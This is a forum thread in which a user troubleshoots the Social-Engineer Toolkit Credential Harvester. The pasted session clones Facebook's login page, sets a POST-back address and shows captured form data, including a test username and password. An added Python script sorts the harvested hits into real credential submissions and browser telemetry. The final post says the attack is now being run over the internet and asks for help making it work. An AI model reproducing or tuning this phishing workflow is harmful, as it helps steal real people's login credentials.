
SET Credential Harvester Attack


littlemule


Can anybody help me with this? This attack has always worked fine in the past when I've used it, but now it's doing this when I use Google Chrome. When I use Windows Explorer, everything seems fine.

Thanks

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>3

 The first method will allow SET to import a list of pre-defined web 
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.73
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.1.67 - - [04/Feb/2015 23:24:03] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=1
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: miny_encode_ms=3
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=Miny1~95~,"~,~","~":~0~.~":"~null~],["~login~",{"~php~323xo~",~click~":[~1423090709517~time_spent~ft~posts~":[["~time_spent_bit_array~tos_id~start_time~tos_array~","/~],"~tos_len~tos_seq~tos_cum~},~click_ref_logger~",["~981~act~1~","-","~r~","/",{"~user~":{},"~gt~":{}},~"],~script_path_change~source_path~":"/~source_token~ad976420~dest_path~dest_token~navigation~impression_id~cause~"},~1423090709533~ods~:~ms~page_id~qa~www~x0o534~1423092247919~568~2~1423090706224~15~559~237~unload~0v29~[{"~]],"~trigger~7~4~11~1423090706~1423090698~9~"},{"~325~b279a230~load~1423092244800~0vL8~253~1423092247915~email~bits~js_initialized~]},~1423092247925~]]}]~2E1DCAy1XCIyPQRGSCIyTz2LwUL2TxAWXz2MwYzAwZz2H-2yxAE_1w2DJMw1yJMx2xwFyKyK1A1B1CO1E1F1G2wx2OxAx1xwIVFBH1HMxAE1IG1J1KFBHy1LC1My1NzDw1OzDw1PzDw1QzDw1RC2C1S1TxAERGSCIyTz2KwUL2zxAWXz2IwYz1zwZz2J-1TxA2F2GC1U1V1WBNB1YB1Z2N1DCAy1XC1-yPQ1IG1JzDw1LzDw1N1KFBHy1OC1My1PzDw1QC2Py1RC2Q1S2RxAE_1w2SJ1_w1yJ2UxAw2VyKyK1A1B1CO1E1F1G2Ax2BxAx1xw1-VFBH1H1_xAE1U1V1WBNB1YB1ZGNB2WB2XL1z2Y2ZxA2-
PARAM: ts=1423092247933
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=2
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}]
PARAM: ts=1423092252940
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


192.168.1.67 - - [04/Feb/2015 23:24:26] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=1
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["script_path_change",{"source_path":null,"source_token":null,"dest_path":"/login.php","dest_token":"ad976420","navigation":null,"impression_id":"b279a230","cause":"load"},1423092268014,0],["click_ref_logger",["0vL8",1423092271140,"act",1423092271139,0,"email","click","click","-","r","/",{"ft":{},"gt":{}},562,238,0,981,"p4l5eo","/login.php"],1423092271140,0],["ods:ms.time_spent.qa.www",{"time_spent.bits.js_initialized":[1]},1423092271161,0]],"trigger":"ods:ms.time_spent.qa.www"}]
PARAM: ts=1423092271180
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=2
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["time_spent_bit_array",{"tos_id":"p4l5eo","start_time":1423092268,"tos_array":[135,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092276055,0]],"trigger":"time_spent_bit_array"}]
PARAM: ts=1423092276071
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVqA1uQz
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=0
PARAM: lgnrnd=152349_xc4V
PARAM: lgnjs=1423092268
POSSIBLE USERNAME FIELD FOUND: email=qwerty
POSSIBLE PASSWORD FIELD FOUND: pass=12345
PARAM: default_persistent=0
PARAM: qsstamp=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
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: 
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


It's the top half of the field, where it says

POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}]

It doesn't show the user or password, but if you look at the bottom half, it will show the username and password, but only if I use Windows Explorer and not Google Chrome.


This harvester is a pretty basic component when it comes to harvesting. You send name-value pairs to the server along with your request, and if the name contains a word that's on the whitelist, it's marked as a HIT and the info in the request is displayed. The difference between Google and IE probably has a lot to do with JavaScript support, or even simply the fact that the server detected it as browser X and thus gave it something else to do which was easier to circumvent.

Either way, it's not so much a problem with your setup.

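The reply above explains why the harvester prints so many "hits": it keyword-matches the submitted name-value pairs, so anything containing a whitelisted word such as "user" is flagged, whether or not it is a login form. Judging from the output pasted earlier, Chrome's JavaScript fires analytics beacons (the JSON-encoded `q=[{"user":"0",...` parameter and `__user=0`) before the real form is ever submitted, and those trip the same match. The script below is an added example, not part of the thread or of SET itself: it parses the harvester's console output into individual hits and separates the one genuine form submission (a flagged password field plus a plain-text username field) from the telemetry noise (flagged fields whose value is a JSON object or array). The log text is a constructed, abridged copy of the output shown in the thread, and the classification rules are this example's own assumptions about what the pasted output means, not SET's internal logic.

```python
"""Triage SET Credential Harvester console output.

Splits the log into per-POST "hits" and labels each one as a real form
submission or as JavaScript telemetry that merely matched a keyword.
Added example; the log below is a constructed, abridged copy of the thread's output.
"""
import json
import re
from dataclasses import dataclass, field

HIT_START = "[*] WE GOT A HIT!"
HIT_END = "[*] WHEN YOU'RE FINISHED"
# One parameter line as SET prints it: "<tag>: <name>=<value>"
LINE_RE = re.compile(
    r"^(?P<tag>PARAM|POSSIBLE USERNAME FIELD FOUND|POSSIBLE PASSWORD FIELD FOUND):\s*(?P<body>.*)$"
)

# Constructed sample, abridged from the output pasted in the thread.
SAMPLE_LOG = """\
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __req=1
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534"},1423092252924,0]],"trigger":"time_spent_bit_array"}]
PARAM: ts=1423092252940
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVqA1uQz
PARAM: trynum=1
POSSIBLE USERNAME FIELD FOUND: email=qwerty
POSSIBLE PASSWORD FIELD FOUND: pass=12345
PARAM: default_persistent=0
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


[*] WE GOT A HIT! Printing the output:
PARAM: 
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
"""


@dataclass
class Hit:
    """All parameters of one captured POST, plus which names SET flagged."""
    params: dict = field(default_factory=dict)      # name -> value
    username_fields: list = field(default_factory=list)
    password_fields: list = field(default_factory=list)


def parse_hits(log_text):
    """Group the console lines between HIT_START and HIT_END into Hit objects."""
    hits, current = [], None
    for raw in log_text.splitlines():
        line = raw.strip()
        if line.startswith(HIT_START):
            current = Hit()
            continue
        if line.startswith(HIT_END):
            if current is not None:
                hits.append(current)
            current = None
            continue
        m = LINE_RE.match(line)
        if current is None or not m:
            continue
        body = m.group("body")
        if not body:
            continue  # the bare "PARAM: " line SET prints for a bodyless POST
        name, _, value = body.partition("=")  # split on the first '=' only
        current.params[name] = value
        tag = m.group("tag")
        if tag.startswith("POSSIBLE USERNAME"):
            current.username_fields.append(name)
        elif tag.startswith("POSSIBLE PASSWORD"):
            current.password_fields.append(name)
    return hits


def looks_like_json(value):
    """True when the value is a JSON object/array, i.e. a JS telemetry payload."""
    try:
        return isinstance(json.loads(value), (dict, list))
    except ValueError:
        return False


def classify(hit):
    """Assumed rules: a flagged password field means a real form submission;
    a flagged field carrying JSON is client-side telemetry; a plain keyword
    match with no password is noise such as '__user=0'."""
    if hit.password_fields:
        return "credential_submission"
    if any(looks_like_json(hit.params[n]) for n in hit.username_fields):
        return "telemetry"
    if hit.username_fields:
        return "keyword_only"
    return "no_match"


def summarize(log_text):
    """Return (label, flagged_fields) per hit; flagged fields only for real submissions."""
    out = []
    for hit in parse_hits(log_text):
        label = classify(hit)
        fields = {}
        if label == "credential_submission":
            for name in hit.username_fields + hit.password_fields:
                fields[name] = hit.params[name]
        out.append((label, fields))
    return out


if __name__ == "__main__":
    for label, fields in summarize(SAMPLE_LOG):
        print(label, fields)
```

Run against the thread's own output, the first several hits classify as telemetry or keyword-only noise and only the hit containing `email=` and `pass=` is a form submission. That is the same result the poster sees with the other browser: the login POST is still captured at the end; Chrome simply sends extra JavaScript beacons first that the keyword match also reports.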

1. Don't think so.

2. No idea. Maybe someone else can chip in on that.

3. Just go to Oracle's download page, download and install. Easy peasy.

4. It's written right here. Grab git, clone SET as described on the page and install (probably compile first; it'll be self-explanatory). Look for a readme or some such.


  • 3 weeks later...

I keep getting the same problem. When I do the attack on my network, you can see the username and password, but when I do it over the internet I get what I've shown above in my previous post. When I do the attack over the internet, everything works fine until the username and password are sent through to my computer, and as you can see it's just a jumble of letters and numbers. Can anybody help? Cheers

